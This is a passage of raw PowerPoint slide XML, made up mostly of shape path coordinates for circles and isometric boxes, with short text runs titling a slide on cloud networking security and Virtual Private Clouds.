                    <a:pt x="549107" y="2225446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587753" y="2249745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627360" y="2272612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667890" y="2294012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709308" y="2313908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751576" y="2332265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794660" y="2349045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838523" y="2364213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="883127" y="2377733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="928438" y="2389567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="974419" y="2399680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021034" y="2408036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068246" y="2414598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116019" y="2419330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164317" y="2422196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213103" y="2423160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1261890" y="2422196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310188" y="2419330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1357961" y="2414598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1405173" y="2408036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1451788" y="2399680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497769" y="2389567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543080" y="2377733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587684" y="2364213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631547" y="2349045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674631" y="2332265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716899" y="2313908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758317" y="2294012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798847" y="2272612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838454" y="2249745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1877100" y="2225446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1914751" y="2199753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951369" y="2172701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1986918" y="2144327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2021362" y="2114667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054665" y="2083757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2086791" y="2051634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2117703" y="2018334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147365" y="1983892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2175740" y="1948346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2202794" y="1911731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228488" y="1874085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2252788" y="1835442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275656" y="1795840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2297057" y="1755314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2316954" y="1713901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2335311" y="1671637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352092" y="1628559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367260" y="1584703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380780" y="1540104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2392615" y="1494800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402728" y="1448826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411084" y="1402219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417646" y="1355014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2422378" y="1307249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425244" y="1258960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2426207" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425274" y="1162218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2422497" y="1114729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417911" y="1067752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411551" y="1021320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403451" y="975468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393647" y="930229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2382173" y="885639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2369064" y="841731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2354355" y="798540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338081" y="756099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320275" y="714444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2300974" y="673609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2280212" y="633627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258024" y="594534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2234444" y="556363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2209507" y="519148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183248" y="482925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155702" y="447727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126904" y="413588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096888" y="380543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065689" y="348627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033342" y="317873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999882" y="288315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1965344" y="259988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929762" y="232927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893170" y="207165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855605" y="182738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817101" y="159678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777691" y="138020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737412" y="117800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696298" y="99050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654384" y="81806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611705" y="66101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568294" y="51970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524188" y="39447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479421" y="28566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1434027" y="19362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1388042" y="11869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341500" y="6122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294436" y="2154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246885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40400" y="306451"/>
            <a:ext cx="477456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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Networking</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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74767" y="1933193"/>
            <a:ext cx="69113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Some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fea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tur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Virtua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Priva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5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ouds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(VP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s):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90515" y="760476"/>
            <a:ext cx="6516624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189541" y="5192521"/>
            <a:ext cx="3432810" cy="2155190"/>
            <a:chOff x="3189541" y="5192521"/>
            <a:chExt cx="3432810" cy="2155190"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194304" y="6278879"/>
              <a:ext cx="1714500" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1714500" h="1064259">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="662940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714499" y="1063752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714499" y="3994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194304" y="6278879"/>
              <a:ext cx="1714500" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1714500" h="1064259">
                  <a:moveTo>
                    <a:pt x="1714499" y="1063752"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="662940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714499" y="399415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714499" y="106375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904232" y="6278879"/>
              <a:ext cx="1713230" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1713229" h="1064259">
                  <a:moveTo>
                    <a:pt x="1712975" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="399415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1063752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712975" y="662940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712975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904232" y="6278879"/>
              <a:ext cx="1713230" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1713229" h="1064259">
                  <a:moveTo>
                    <a:pt x="1712975" y="662940"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1063752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="399415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712975" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712975" y="66294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194304" y="5870447"/>
              <a:ext cx="3423285" cy="807720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3423284" h="807720">
                  <a:moveTo>
                    <a:pt x="1713992" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="400431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="408558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710562" y="807719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3422904" y="408558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3422904" y="400431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713992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194304" y="5870447"/>
              <a:ext cx="3423285" cy="807720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3423284" h="807720">
                  <a:moveTo>
                    <a:pt x="3422904" y="408558"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1710562" y="807719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="408558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="400431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713992" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3422904" y="400431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3422904" y="40855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380738" y="5205221"/>
              <a:ext cx="1051560" cy="1074420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1051560" h="1074420">
                  <a:moveTo>
                    <a:pt x="525779" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477931" y="2195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431285" y="8655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386027" y="19191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342341" y="33611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300415" y="51727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260434" y="73349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222584" y="98287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187050" y="126351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154019" y="157352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123676" y="191101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96206" y="227406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71797" y="266079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50633" y="306929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32900" y="349768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18785" y="394405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8472" y="440651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149" y="488316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="537210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149" y="586103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8472" y="633768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18785" y="680014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32900" y="724651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50633" y="767490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71797" y="808340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96206" y="847013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123676" y="883318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154019" y="917067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187050" y="948068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222584" y="976132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260434" y="1001070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300415" y="1022692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342341" y="1040808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386027" y="1055228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431285" y="1065764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477931" y="1072224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525779" y="1074420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573628" y="1072224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620274" y="1065764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665532" y="1055228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709218" y="1040808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751144" y="1022692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791125" y="1001070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828975" y="976132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864509" y="948068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897540" y="917067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927883" y="883318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955353" y="847013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979762" y="808340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000926" y="767490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018659" y="724651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032774" y="680014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043087" y="633768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049410" y="586103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051560" y="537210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049410" y="488316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043087" y="440651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032774" y="394405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018659" y="349768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000926" y="306929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979762" y="266079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955353" y="227406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927883" y="191101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897540" y="157353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864509" y="126351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828975" y="98287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791125" y="73349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751144" y="51727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709218" y="33611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665532" y="19191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620274" y="8655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573628" y="2195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525779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380738" y="5205221"/>
              <a:ext cx="1051560" cy="1074420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1051560" h="1074420">
                  <a:moveTo>
                    <a:pt x="0" y="537210"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2149" y="488316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8472" y="440651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18785" y="394405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32900" y="349768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50633" y="306929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71797" y="266079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96206" y="227406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123676" y="191101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154019" y="157352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187050" y="126351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222584" y="98287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260434" y="73349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300415" y="51727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342341" y="33611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386027" y="19191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431285" y="8655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477931" y="2195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525779" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573628" y="2195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620274" y="8655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665532" y="19191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709218" y="33611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751144" y="51727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791125" y="73349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828975" y="98287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864509" y="126351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897540" y="157353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927883" y="191101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955353" y="227406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979762" y="266079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000926" y="306929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018659" y="349768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032774" y="394405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043087" y="440651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049410" y="488316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051560" y="537210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049410" y="586103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043087" y="633768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032774" y="680014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018659" y="724651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000926" y="767490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979762" y="808340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955353" y="847013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927883" y="883318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897540" y="917067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864509" y="948068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828975" y="976132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791125" y="1001070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751144" y="1022692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709218" y="1040808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665532" y="1055228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620274" y="1065764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573628" y="1072224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525779" y="1074420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477931" y="1072224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431285" y="1065764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386027" y="1055228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342341" y="1040808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300415" y="1022692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260434" y="1001070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222584" y="976132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187050" y="948068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154019" y="917067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123676" y="883318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96206" y="847013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71797" y="808340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50633" y="767490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32900" y="724651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18785" y="680014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8472" y="633768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149" y="586103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="53721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4813808" y="5548629"/>
            <a:ext cx="18542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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>1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663493" y="5168138"/>
            <a:ext cx="3432810" cy="2155190"/>
            <a:chOff x="9663493" y="5168138"/>
            <a:chExt cx="3432810" cy="2155190"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9668256" y="6254496"/>
              <a:ext cx="1714500" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1714500" h="1064259">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="662939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714500" y="1063752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714500" y="3994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668256" y="6254496"/>
              <a:ext cx="1714500" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1714500" h="1064259">
                  <a:moveTo>
                    <a:pt x="1714500" y="1063752"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="662939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714500" y="399414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714500" y="106375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1379708" y="6254496"/>
              <a:ext cx="1711960" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1711959" h="1064259">
                  <a:moveTo>
                    <a:pt x="1711452" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="399414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1063752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711452" y="662939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711452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1379708" y="6254496"/>
              <a:ext cx="1711960" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
